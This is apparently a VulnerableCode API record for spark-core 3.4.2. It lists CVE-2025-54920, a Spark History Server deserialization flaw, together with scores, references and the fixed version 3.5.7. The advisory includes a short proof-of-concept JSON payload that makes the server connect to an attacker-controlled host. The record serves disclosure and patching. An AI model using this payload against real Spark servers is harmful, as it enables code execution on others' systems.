Django REST framework

Lookup for vulnerable packages by Package URL.

Purl pkg:maven/org.apache.spark/spark-core_2.12@3.4.2

Type maven

Namespace org.apache.spark

Name spark-core_2.12

Version 3.4.2

Qualifiers

Subpath

Is_vulnerable true

Next_non_vulnerable_version 3.5.7

Latest_non_vulnerable_version 3.5.7

Affected_by_vulnerabilities

url VCID-1gtx-thb1-9ud6

vulnerability_id VCID-1gtx-thb1-9ud6

summary

Apache Spark: Spark History Server Code Execution Vulnerability
This issue affects Apache Spark: before 3.5.7 and 4.0.1. Users are recommended to upgrade to version 3.5.7 or 4.0.1 and above, which fixes the issue.

## Summary

Apache Spark 3.5.4 and earlier versions contain a code execution vulnerability in the Spark History Web UI due to overly permissive Jackson deserialization of event log data. This allows an attacker with access to the Spark event logs directory to inject malicious JSON payloads that trigger deserialization of arbitrary classes, enabling command execution on the host running the Spark History Server.

## Details

The vulnerability arises because the Spark History Server uses Jackson polymorphic deserialization with @JsonTypeInfo.Id.CLASS on SparkListenerEvent objects, allowing an attacker to specify arbitrary class names in the event JSON. This behavior permits instantiating unintended classes, such as org.apache.hive.jdbc.HiveConnection, which can perform network calls or other malicious actions during deserialization.

The attacker can exploit this by injecting crafted JSON content into the Spark event log files, which the History Server then deserializes on startup or when loading event logs. For example, the attacker can force the History Server to open a JDBC connection to a remote attacker-controlled server, demonstrating remote command injection capability.

## Proof of Concept:

1. Run Spark with event logging enabled, writing to a writable directory (spark-logs).

2. Inject the following JSON at the beginning of an event log file:

```
{

"Event": "org.apache.hive.jdbc.HiveConnection",
"uri": "jdbc:hive2://<IP>:<PORT>/",
"info": {
"hive.metastore.uris": "thrift://<IP>:<PORT>"
}
}
```
3. Start the Spark History Server with logs pointing to the modified directory.

4. The Spark History Server initiates a JDBC connection to the attacker’s server, confirming the injection.

## Impact

An attacker with write access to Spark event logs can execute arbitrary code on the server running the History Server, potentially compromising the entire system.

references

reference_url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json

reference_id

reference_type

scores

value	6.7
scoring_system	cvssv3
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L

url

https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2025-54920.json

reference_url

https://api.first.org/data/v1/epss?cve=CVE-2025-54920

reference_id

reference_type

scores

value	0.00498
scoring_system	epss
scoring_elements	0.65841
published_at	2026-04-02T12:55:00Z

value	0.00498
scoring_system	epss
scoring_elements	0.65837
published_at	2026-04-07T12:55:00Z

value	0.00498
scoring_system	epss
scoring_elements	0.65871
published_at	2026-04-04T12:55:00Z

value	0.00674
scoring_system	epss
scoring_elements	0.71392
published_at	2026-04-08T12:55:00Z

value	0.00674
scoring_system	epss
scoring_elements	0.71428
published_at	2026-04-11T12:55:00Z

value	0.00674
scoring_system	epss
scoring_elements	0.71405
published_at	2026-04-09T12:55:00Z

value	0.00674
scoring_system	epss
scoring_elements	0.71412
published_at	2026-04-12T12:55:00Z

value	0.00674
scoring_system	epss
scoring_elements	0.71395
published_at	2026-04-13T12:55:00Z

value	0.00718
scoring_system	epss
scoring_elements	0.7248
published_at	2026-04-16T12:55:00Z

value	0.00718
scoring_system	epss
scoring_elements	0.72489
published_at	2026-04-18T12:55:00Z

url

https://api.first.org/data/v1/epss?cve=CVE-2025-54920

reference_url

https://github.com/apache/spark

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://github.com/apache/spark

reference_url

https://github.com/apache/spark/pull/51312

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/

url

https://github.com/apache/spark/pull/51312

reference_url

https://github.com/apache/spark/pull/51323

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/

url

https://github.com/apache/spark/pull/51323

reference_url

https://issues.apache.org/jira/browse/SPARK-52381

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/

url

https://issues.apache.org/jira/browse/SPARK-52381

reference_url

https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

value	Track
scoring_system	ssvc
scoring_elements	SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-03-17T03:55:33Z/

url

https://lists.apache.org/thread/4y9n0nfj7m68o2hpmoxgc0y7dm1lo02s

reference_url

https://nvd.nist.gov/vuln/detail/CVE-2025-54920

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

https://nvd.nist.gov/vuln/detail/CVE-2025-54920

reference_url

http://www.openwall.com/lists/oss-security/2026/03/13/4

reference_id

reference_type

scores

value	8.8
scoring_system	cvssv3.1
scoring_elements	CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

value	HIGH
scoring_system	generic_textual
scoring_elements

url

http://www.openwall.com/lists/oss-security/2026/03/13/4

reference_url	https://bugzilla.redhat.com/show_bug.cgi?id=2447599
reference_id	2447599
reference_type
scores
url	https://bugzilla.redhat.com/show_bug.cgi?id=2447599

reference_url

https://github.com/advisories/GHSA-jwp6-cvj8-fw65

reference_id

GHSA-jwp6-cvj8-fw65

reference_type

scores

value	HIGH
scoring_system	cvssv3.1_qr
scoring_elements

url

https://github.com/advisories/GHSA-jwp6-cvj8-fw65

fixed_packages

url	pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
purl	pkg:maven/org.apache.spark/spark-core_2.12@3.5.7
is_vulnerable	`false`
affected_by_vulnerabilities
resource_url	http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.5.7

aliases CVE-2025-54920, GHSA-jwp6-cvj8-fw65

risk_score 4.0

exploitability 0.5

weighted_severity 8.0

resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-1gtx-thb1-9ud6

Fixing_vulnerabilities

Risk_score 4.0

Resource_url http://public2.vulnerablecode.io/packages/pkg:maven/org.apache.spark/spark-core_2.12@3.4.2

Package Instance